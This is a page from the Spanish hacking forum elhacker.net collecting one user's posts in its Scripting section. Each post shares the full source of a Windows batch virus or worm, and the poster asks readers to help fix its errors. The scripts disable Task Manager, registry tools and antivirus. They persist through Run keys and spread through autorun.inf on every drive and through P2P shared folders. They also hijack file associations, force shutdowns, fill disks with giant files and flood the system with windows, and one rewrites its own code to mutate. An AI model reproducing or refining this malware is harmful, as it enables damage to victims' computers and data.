elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: [1] 2
1  Programación / Scripting / virus informatico llamado e.coli.bat en: 12 Junio 2011, 17:44 pm
sin ven errores en mi codigo por favor notificar

su amigo by hackerd W4rR3d

Código
  1. @echo off
  2. ::by hacked W4rR3d
  3. ::Comunidad Informatica Black Eye Security Team
  4. :: Piura - Perù
  5. Set ecoli=echo
  6. Set HC= C:\
  7. Set HD= D:\
  8. Set HE= E:\
  9. Set HF= F:\
  10. Set HG= G:\
  11. Set HH=copy /y %0
  12. taskkill  /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F
  13. tskkill  /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F
  14. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f
  15. REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f
  16. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  17. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  18. reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
  19. if exist C:\ goto C1
  20. if not exist "C:\"goto t1
  21. :C1
  22. if exist C:\e.coli.bat attrib +h +s +r C:\e.coli.bat&attrib +h +s +r C:\autorun.inf
  23. copy /y %0 C:\e.coli.bat
  24. %ecoli% [autorun] >>C:\autorun.inf
  25. %ecoli% OPEN=e.coli.bat >>C:\autorun.inf
  26. %ecoli% shell\open\Command=e.coli.bat >>C:\autorun.inf
  27. %ecoli% shell\open\Default=1 >>C:\autorun.inf
  28. %ecoli% shell\explore\Command=e.coli.bat >>C:\autorun.inf
  29. attrib +h +s +r C:\e.coli.bat
  30. attrib +h +s +r C:\autorun.inf
  31. :t1
  32. if exist D:\ goto D1
  33. if not exist "D:\"goto t2
  34. :D1
  35. if exist D:\e.coli.bat attrib +h +s +r D:\e.coli.bat&attrib +h +s +r D:\autorun.inf
  36. copy /y %0 D:\e.coli.bat
  37. %ecoli% [autorun] >>D:\autorun.inf
  38. %ecoli% OPEN=e.coli.bat >>D:\autorun.inf
  39. %ecoli% shell\open\Command=e.coli.bat >>D:\autorun.inf
  40. %ecoli% shell\open\Default=1 >>D:\autorun.inf
  41. %ecoli% shell\explore\Command=e.coli.bat >>D:\autorun.inf
  42. attrib +h +s +r D:\e.coli.bat
  43. attrib +h +s +r D:\autorun.inf
  44. :t2
  45. if exist E:\ goto E1
  46. if not exist "E:\"goto t3
  47. :E1
  48. if exist E:\e.coli.bat attrib +h +s +r E:\e.coli.bat&attrib +h +s +r E:\autorun.inf
  49. copy /y %0 E:\e.coli.bat
  50. %ecoli% [autorun] >>E:\autorun.inf
  51. %ecoli% OPEN=e.coli.bat >>E:\autorun.inf
  52. %ecoli% shell\open\Command=e.coli.bat >>E:\autorun.inf
  53. %ecoli% shell\open\Default=1 >>E:\autorun.inf
  54. %ecoli% shell\explore\Command=e.coli.bat >>E:\autorun.inf
  55. attrib +h +s +r E:\e.coli.bat
  56. attrib +h +s +r E:\autorun.inf
  57. :T3
  58. if exist F:\ goto F1
  59. if not exist "F:\"goto t4
  60. :F1
  61. if exist F:\e.coli.bat attrib +h +s +r F:\e.coli.bat&attrib +h +s +r F:\autorun.inf
  62. copy /y %0 F:\e.coli.bat
  63. %ecoli% [autorun] >>F:\autorun.inf
  64. %ecoli% OPEN=e.coli.bat >>F:\autorun.inf
  65. %ecoli% shell\open\Command=e.coli.bat >>F:\autorun.inf
  66. %ecoli% shell\open\Default=1 >>F:\autorun.inf
  67. %ecoli% shell\explore\Command=e.coli.bat >>F:\autorun.inf
  68. attrib +h +s +r F:\e.coli.bat
  69. attrib +h +s +r F:\autorun.inf
  70. :T4
  71. if exist G:\ goto G1
  72. if not exist "G:\"goto open
  73. :G1
  74. if exist G:\e.coli.bat attrib +h +s +r G:\e.coli.bat&attrib +h +s +r G:\autorun.inf
  75. copy /y %0 G:\e.coli.bat
  76. %ecoli% [autorun] >>G:\autorun.inf
  77. %ecoli% OPEN=e.coli.bat >>G:\autorun.inf
  78. %ecoli% shell\open\Command=e.coli.bat >>G:\autorun.inf
  79. %ecoli% shell\open\Default=1 >>G:\autorun.inf
  80. %ecoli% shell\explore\Command=e.coli.bat >>G:\autorun.inf
  81. attrib +h +s +r G:\e.coli.bat
  82. attrib +h +s +r G:\autorun.inf
  83. :open
  84. if exist %HC%open.vbs goto cop
  85. %ecoli%On Error Resume Next >> %HC%open.vbs
  86. %ecoli%Set oWMP = CreateObject("WMPlayer.OCX.7")>> %HC%open.vbs
  87. %ecoli%Set colCDROMs = oWMP.cdromCollection>> %HC%open.vbs
  88. %ecoli%do>> %HC%open.vbs
  89. %ecoli%if colCDROMs.Count >= 1 then>> %HC%open.vbs
  90. %ecoli%For i = 0 to colCDROMs.Count - 1>> %HC%open.vbs
  91. %ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs
  92. %ecoli%Next>> %HC%open.vbs
  93. %ecoli%For i = 0 to colCDROMs.Count - 1>> %HC%open.vbs
  94. %ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs
  95. %ecoli%Next>> %HC%open.vbs
  96. %ecoli%End If>> %HC%open.vbs
  97. %ecoli%wscript.sleep 5000>> %HC%open.vbs
  98. %ecoli%loop >> %HC%open.vbs
  99. start  %HC%open.vbs
  100. :cop
  101. if exist %HC%\apgar.vbs goto reini
  102. %HH% "%appdata%\e.coli_a.exe"
  103. %HH% "%windir%\e.coli_b.exe"
  104. %HH% "%systemroot%\system32\e.coli_c.exe"
  105. %HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"
  106. %HH% "%programfiles%\Internet Explorer\e.coli_e.exe"
  107. %HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"
  108. %HH% "%programfiles%\Winamp\e.coli_f.exe"
  109. %HH% "%programfiles%\WinRAR\e.coli_g.exe"
  110. %HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"
  111. %HH% "%programfiles%\shARES\e.coli_i.exe"
  112. %HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"
  113. %HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"
  114. %HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"
  115. %HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
  116. %HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe"
  117. :reini
  118. if exist %HC%\Warning.vbs goto war
  119. %ecoli% On Error Resume Next >> %HC%\apgar.vbs
  120. %ecoli% set shell = CreateObject("WScript.Shell") >> %HC%\apgar.vbs
  121. %ecoli% shell.run "shutdown.exe -s -f -t 7 " >> %HC%\apgar.vbs
  122. start  %HC%\apgar.vbs
  123. :war
  124. if exist %HC%\cmds.bat goto cmds
  125. echo msn=msgbox("Warning Warning Warning",16," no me puedes vencer") >> %HC%\Warning.vbs
  126. For /L %%a IN (0,1,1000) DO  start %HC%\Warning.vbs
  127. :cmds
  128. if exist %windir%e.coli.bat goto wi
  129. :wi
  130. for %%A in (C,D,E,F,G,H,I,J,K,L,M,N,Ñ,O,P,Q,R,S,T,U,V,W,X,Y,Z) do if exist "%%A:\" copy /y %0 "%%A:\INFECTED!!!"
  131. for %%E in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink,html) do assoc .%%E=batfile
  132. for %%I in (bmp.exe,gif.exe,doc.exe,mpeg.exe,xlsx.exe,avi.exe,mpg.exe,mp3.exe,mp4.exe,rar.exe,zip.exe,ink.exe,html.exe,winlogon.exe,winupdate.exe,winservice.exe,TASKMAN.exe,jpg.exe) do copy /y %0 "%windir%\%%I"
  133. attrib +h %windir%
  134. for %%p in (WINWORD.exe,EXCEL.exe,POWERPNT.exe,Winrar.exe,firefox.exe,iexplore.exe,wmplayer.exe,Ares.exe,msnmsgr.exe) do tasklist /m | find /i "%%p" && taskkill /f /im %%p.exe
  135. echo fsutil file createnew %random%.exe 4000000000>>%windir%\fsutil.exe
  136. start %windir%\fsutil.exe
  137. if exist "%windir%\jpg.exe" (goto ves) else (goto Full Disk)
  138. copy /y %0 "%windir%\jpg.exe"
  139. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%windir%\jpg.exe"" /f
  140. :ves
  141. echo 00000000  000      000 0000000000 0000000000 0000000000 00000000000 0000000000 000000>>%userprofile%\Desktop\I.txt
  142. echo 00000000  0000     000 0000000000 0000000000 0000000000 00000000000 0000000000 00000000>>%userprofile%\Desktop\N.txt
  143. echo   0000    00000    000 000        000        000            000     000        000  0000>>%userprofile%\Desktop\F.txt
  144. echo   0000    000000   000 000        000        000            000     000        000   000>>%userprofile%\Desktop\E.txt
  145. echo   0000    000 000  000 0000000000 0000000000 000            000     0000000000 000   000>>%userprofile%\Desktop\C.txt
  146. echo   0000    000  000 000 0000000000 0000000000 000            000     0000000000 000   000>>%userprofile%\Desktop\T.txt
  147. echo   0000    000   000000 000        000        000            000     000        000   000>>%userprofile%\Desktop\E.txt
  148. echo   0000    000    00000 000        000        000            000     000        000  0000>>%userprofile%\Desktop\D.txt
  149. echo 00000000  000     0000 000        0000000000 0000000000     000     0000000000 00000000>>%userprofile%\Desktop\!.txt
  150. echo 00000000  000      000 000        0000000000 0000000000     000     0000000000 000000>>%userprofile%\Desktop\!!.txt
  151. :Full Disk
  152. fsutil file createnew INFECTED!!!.exe 40000000000
  153. for %%t in (1,1,24) do at %%t /interactive /every:L,M,Mi,J,V,S,D fsutil file createnew %random%.exe 4000000000
  154. for /l %%e in (0,1,5000) do (start cmd)
  155. cls &exit
  156.  
2  Programación / Scripting / virus drivers.bat en: 2 Junio 2011, 18:07 pm
 tu amigo W4rR3d

Código
  1. @echo off
  2. @Set mr=%homedrive%
  3. @Set rsm=%systemroot%
  4. @Set rms=echo
  5. @set kmbfo=copy
  6. TASKKILL /IM explorer.exe/F  IM msnmsgr.exe /F
  7. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v drivers /t REG_SZ /d "%systemroot%\System32\drivers.bat" /f
  8. REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f
  9. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  10. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  11. reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
  12. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  13. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://4.bp.blogspot.com/_04D_IYYf9WA/TTDJzjOv_XI/AAAAAAAAAK4/Gmh_VUM8mJA/s1600/virus.jpg"
  14. reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
  15. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
  16. if exist %%E:\drivers.bat goto rm
  17. for %%E In (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
  18. copy /Y %0 %%E:\drivers.bat
  19. echo.[AutoRun]>> %%E:\autorun.inf
  20. echo.open="%%E:\drivers.bat">> %%E:\autorun.inf
  21. echo.action=Open folder to see files...>> %%E:\autorun.inf
  22. attrib +h +s +r %%E:\autorun.inf
  23. attrib +h +s +r %%E:\drivers.bat
  24. :rm
  25. if exist %mr%\abrir.vbs goto bir
  26. echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> %mr%\abrir.vbs
  27. echo Set colCDROMs = oWMP.cdromCollection >> %mr%\abrir.vbs
  28. echo. >> %mr%\abrir.vbs
  29. echo if colCDROMs.Count >= 1 then >> %mr%\abrir.vbs
  30. echo For i = 0 to colCDROMs.Count - 1 >> %mr%\abrir.vbs
  31. echo colCDROMs.Item(i).Eject >> %mr%\abrir.vbs
  32. echo Next ' cdrom >> %mr%\abrir.vbs
  33. echo End If >> %mr%\abrir.vbs
  34. start %mr%\abrir.vbs
  35. :bir
  36. if exist  %mr%\apagon.vbs goto ir
  37. %rms% On Error Resume Next >> %mr%\apagon.vbs
  38. %rms% set shell = CreateObject("WScript.Shell") >> %mr%\apagon.vbs
  39. %rms% shell.run "shutdown.exe -s -f -t 10 " >> %mr%\apagon.vbs
  40. start %mr%\apagon.vbs
  41. :ir
  42. if exist %rsm%\system32\drivers.bat goto wi
  43. copy %0 %rsm%\system32\drivers.bat
  44. echo On Error Resume next >> "%rsm%\system32\drivers.vbs"
  45. echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"%rsm%\system32\drivers.vbs"
  46. echo oShell.Run "%rsm%\system32\drivers.bat",0 >> start "%rsm%\system32\drivers.vbs"
  47. :wi
  48. if exist %windir%\drivers.bat goto sys
  49. copy %0 %windir%\drivers.bat
  50. echo On Error Resume next >> "%windir%\drivers.vbs"
  51. echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"%windir%\drivers.vbs"
  52. echo oShell.Run "%windir%\drivers.bat",0 >> start "%windir%\drivers.vbs"
  53. :sys
  54. if exist %homedrive%\drivers.bat goto p2p
  55. copy %0 %homedrive%\drivers.bat
  56. echo On Error Resume next >> "%homedrive%\drivers.vbs"
  57. echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"%homedrive%\drivers.vbs"
  58. echo oShell.Run "%homedrive%\drivers.bat",0 >> start "%homedrive%\drivers.vbs"
  59. for %%e in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink) do assoc .%%e=batfile
  60. %rms% set ff=createobject("scripting.filesystemobject")>>bicho.vbs
  61. %rms% set rr=ff.opentextfile(%0,1)>>bicho.vbs
  62. %rms% aa = rr.readall>>bicho.vbs
  63. %rms%% rr.close>>bicho.vbs
  64. %rms% Randomize>>bicho.vbs
  65. %rms% bicho = int(rnd * 3)>>bicho.vbs
  66. %rms% if bicho = 0 or bicho = 2 then>>bicho.vbs
  67. %rms% s = chr(int(22 * rnd) + 97)>>bicho.vbs
  68. %rms% rand1 = Replace(aa,"rms","rms" ^& s ^& bicho)>>bicho.vbs
  69. %rms% rand2 = Replace(rand1,"kmbfo","kmbfo" ^& s ^& s ^& bicho)>>bicho.vbs
  70. %rms% else>>bicho.vbs
  71. %rms% bichonum = int(rnd * 7)>>bicho.vbs
  72. %rms% for i = 1 to bichonum>>bicho.vbs
  73. %rms% bichochar = chr(int(22 * rnd) + 97)>>bicho.vbs
  74. %rms% bichoall = bichoyall + bichochar>>bicho.vbs
  75. %rms% next>>bicho.vbs
  76. %rms% s = chr(int(22 * rnd) + 97)>>bicho.vbs
  77. %rms% rand1 = Replace(aa,"rms",bichoall )>>bicho.vbs
  78. %rms% rand2 = Replace(rand1,"kmbfo", s ^& bichoall)>>bicho.vbs
  79. %rms% end if>>bicho.vbs
  80. %rms%% set bb=ff.opentextfile(%0,2)>>bicho.vbs
  81. %rms% bb.write rand2>>bicho.vbs
  82. :p2p
  83. if exist %Programfiles%\drivers.bat goto @exit
  84. Set prom =%Programfiles%
  85. Set pro=drivers.bat
  86. copy /y "%prom%\Grokster\My Grokster\%pro%"
  87. copy /y "%prom%\Morpheus\My Shared Folder\%pro%"
  88. copy /y "%prom%\ICQ\shared files\%pro%"
  89. copy /y "%prom%\KaZaA\My Shared Folder\%pro%"
  90. copy /y "%prom%\KaZaA Lite\My Shared Folder\%pro%"
  91. copy /y "%prom%\EDONKEY2000\incoming\%pro%"
  92. copy /y "%prom%\eMule\Incoming\%pro%"
  93. copy /y "%prom%\Filetopia3\Files\%pro%"
  94. copy /y "%prom%\appleJuice\incoming\%pro%"
  95. copy /y "%prom%\Gnucleus\Downloads\%pro%"
  96. copy /y "%prom%\LimeWire\Shared\%pro%"
  97. copy /y "%prom%\Overnet\incoming\%pro%"
  98. copy /y "%prom%\Shareaza\Downloads\%pro%"
  99. copy /y "%prom%\Swaptor\Download\%pro%"
  100. copy /y "%prom%\WinMX\My Shared Folder\%pro%"
  101. copy /y "%prom%\Tesla\Files\%pro%"
  102. copy /y "%prom%\XoloX\Downloads\%pro%"
  103. copy /y "%prom%\Rapigator\Share\%pro%"
  104. copy /y "%prom%\KMD\My Shared Folder\%pro%"
  105. copy /y "%prom%\BearShare\Shared\%pro%"
  106. copy /y "%prom%\Direct Connect\Received Files\%pro%"
  107. @cscript bicho.vbs
  108. @del bicho.vbs
  109.  
3  Programación / Scripting / worm Windows_updates_downloader2.5.bat en: 5 Mayo 2011, 03:04 am
este worm esta dedicado al grupo de hackers Kao Team
 
 
Código
  1.                         goto per
  2. ::worm Windows_updates_downloader2.5.bat
  3. ::by hacker W4rR3d
  4. ::Comunidad hacker "Black Eye Security Team" Piura -Peru
  5. :per
  6. if exist "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat"  ( goto dn) else goto :NN
  7. :NN
  8. :Encryptions
  9. Set ts=set
  10. %ts% f=f
  11. %ts% ph=copy
  12. %ts% vsb=echo
  13. %ts% lcf=call
  14. %ts% r=r
  15. :registro protection
  16. TASKKILL /IM explorer.exe /F
  17. TASKKILL /IM msnmsgr.exe /F
  18. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v updates /t REG_SZ /d "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat" /f
  19. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  20. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  21. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  22. reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
  23. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  24. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://windows-updates-downloader.softonic.com/descargar"
  25. reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
  26. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
  27. :agregarse en dispositivos
  28. %f%o%r% %%p in (b e f g h i j k l m n o p q r s t u v w x y z) do if exist %%p:%0 goto LOG
  29. %f%o%r% %%i In (b e f g h i j k l m n o p q r s t u v w x y z)  do type %0 > %%i:
  30. %vsb% [autorun] >> %%i:\autorun.inf
  31. %vsb% open=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf
  32. %vsb% shellexecute=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf
  33. %vsb% Icon=%windir%\system32\Shell32.dll,4 >> %%i:\autorun.inf
  34. %vsb% Shell\Open\COMMAND=Windows_updates_downloader2.5.bat
  35. %vsb% Shell\Explore\command=Windows_updates_downloader2.5.bat
  36. %vsb% UseAutoPlay=1
  37. attrib +h +s +r %%i:\autorun.inf
  38. :extenderse
  39. md C:\c5734b2b09076e4acebc92bb8c25
  40. %ph% %0 C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat
  41. attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat
  42. attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25
  43. :hidden in bmp
  44. %vsb% On Error Resume Next >> C:\terror.vbs
  45. %vsb% Set Ws = CreateObject("WScript.Shell") >> C:\terror.vbs
  46. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\bmpfile\shell\open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  47. %vsb% Ws.regwrite "HkEY_CLASSES_ROOT\Folder\Shell\Explore\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  48. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\Folder\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  49. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\exefile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  50. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  51. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  52. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\htmlfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  53. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\HTTP\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  54. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\https\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  55. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inffile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  56. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inifile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  57. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  58. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  59. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mp3file\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  60. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\txtfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  61. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\wmafile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  62. start C:\terror.vbs
  63. :back
  64. %ph% %0 C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Usub.exe
  65. %ph% %0 %SYSTEMROOT%\SYSTEM32\Usub.exe
  66. %ph% %0 %SYSTEMDRIVE%\Usub.exe
  67. %ph% %0 %userprofile%\Usub.exe
  68. %ph% %0 %programfiles%\Usub.exe
  69. %ph% %0 C:\RECYCLER\Usub.bmp
  70. :mensaje
  71. %vsb% On Error Resume Next >> C:\ipnuker.vbs
  72. %vsb% Msgbox "Computer is infected with a virus.",16,"hacked by W4rR3d" >> C:\ipnuker.vbs
  73. For /L %%a IN (0,1,1000) DO start start C:\ipnuker.vbs
  74. :LOG
  75. %vsb% ::USuB Log:: >> USuB_Log.log
  76. %vsb% Directory *c5734b2b09076e4acebc92bb8c25* >> Usub_Log.log
  77. %vsb% USB's in drive A-Z excluding C, D, and E, Installed >> Usub_Log.log
  78. %ph% USuB_Log.log C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log
  79. attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log
  80. del %curdir% Usub_Log.log
  81. :dn
  82. %vsb% On Error Resume Next >> C:\apagar.vbs
  83. %vsb% set shell = CreateObject("WScript.Shell") >> C:\apagar.vbs
  84. %vsb% shell.run "shutdown.exe -s -f -t 8 " >> C:\apagar.vbs
  85. start  C:\apagar.vbs
  86. :Memory Loop
  87. goto Memory Loop
4  Programación / Scripting / virus informatico taskmgr.bat en: 17 Marzo 2011, 05:09 am
 
grupo black Eye Security Team   su amigo W4rR3d

espero que lo corrigan este virus informatico

Código
  1. @echo off
  2. msg * hacked by -={W4rR3d}=-
  3. net stop "Firewall de Windows/Conexion compartida a Internet (ICS)"
  4. net stop "Actualizaciones automáticas"
  5. net stop "Centro de seguridad"
  6. net stop "nod32krn"
  7. net stop "nod32kui"
  8. net stop "nod32"
  9. net stop "TeaTimer"
  10. taskkill /f/im "explorer.exe /im "teatimer.exe"/im "taskmgr.exe
  11. Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe
  12. start /MAX %homedrive%\boot.ini & rundll32 user32.dll,SwapMouseButton
  13. REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v TASKMGR /t REG_SZ /d "C:\taskmgr.bat" /f
  14. REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SHUTDOWN /t REG_SZ /d "C:\apagar.vbs" /f
  15. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  16. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  17. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableMsConfig /t REG_DWORD /d 1 /f
  18. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  19. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
  20. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  21. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  22. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://www.imagehousing.com/image/671793"
  23. reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
  24. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
  25. Set task=echo
  26. copy /Y "%0" "C:\taskmgr.bat"
  27. if exist C:\autorun.inf goto D
  28. %task%.[Autorun] >> C:\Autorun.inf
  29. %task%.label=Pendrive >> C:\Autorun.inf
  30. %task%.action=Abrir Pendrive >> C:\Autorun.inf
  31. %task%.shellexecute="/taskmgr.bat" >> C:\Autorun.inf
  32. echo On Error Resume Next >> C:\taskmgr.vbs
  33. echo set shell = CreateObject("WScript.Shell") >> C:\taskmgr.vbs
  34. echo shell.run "C:\taskmgr.bat",0 >> C:\taskmgr.vbs
  35. start  C:\taskmgr.vbs
  36. attrib +s +h +r C:\taskmgr.bat
  37. attrib +s +h +r C:\autorun.inf
  38. :D
  39. copy /Y "%0" "D:\taskmgr.bat"
  40. if exist D:\autorun.inf goto E
  41. %task%.[Autorun] >> D:\Autorun.inf
  42. %task%.label=Pendrive >> D:\Autorun.inf
  43. %task%.action=Abrir Pendrive >> D:\Autorun.inf
  44. %task%.shellexecute="/taskmgr.bat" >> D:\Autorun.inf
  45. echo On Error Resume Next >> D:\taskmgr.vbs
  46. echo set shell = CreateObject("WScript.Shell") >> D:\taskmgr.vbs
  47. echo shell.run "D:\taskmgr.bat",0 >> D:\taskmgr.vbs
  48. start  D:\taskmgr.vbs
  49. attrib +s +h +r D:\taskmgr.bat
  50. attrib +s +h +r D:\autorun.inf
  51. :E
  52. copy /Y "%0" "E:\taskmgr.bat"
  53. if exist E:\autorun.inf goto F
  54. %task%.[Autorun] >> E:\Autorun.inf
  55. %task%.label=Pendrive >> E:\Autorun.inf
  56. %task%.action=Abrir Pendrive >> E:\Autorun.inf
  57. %task%.shellexecute="/taskmgr.bat" >> E:\Autorun.inf
  58. echo On Error Resume Next >> E:\taskmgr.vbs
  59. echo set shell = CreateObject("WScript.Shell") >> E:\taskmgr.vbs
  60. echo shell.run "E:\taskmgr.bat",0 >> E:\taskmgr.vbs
  61. start  E:\taskmgr.vbs
  62. attrib +s +h +r E:\taskmgr.bat
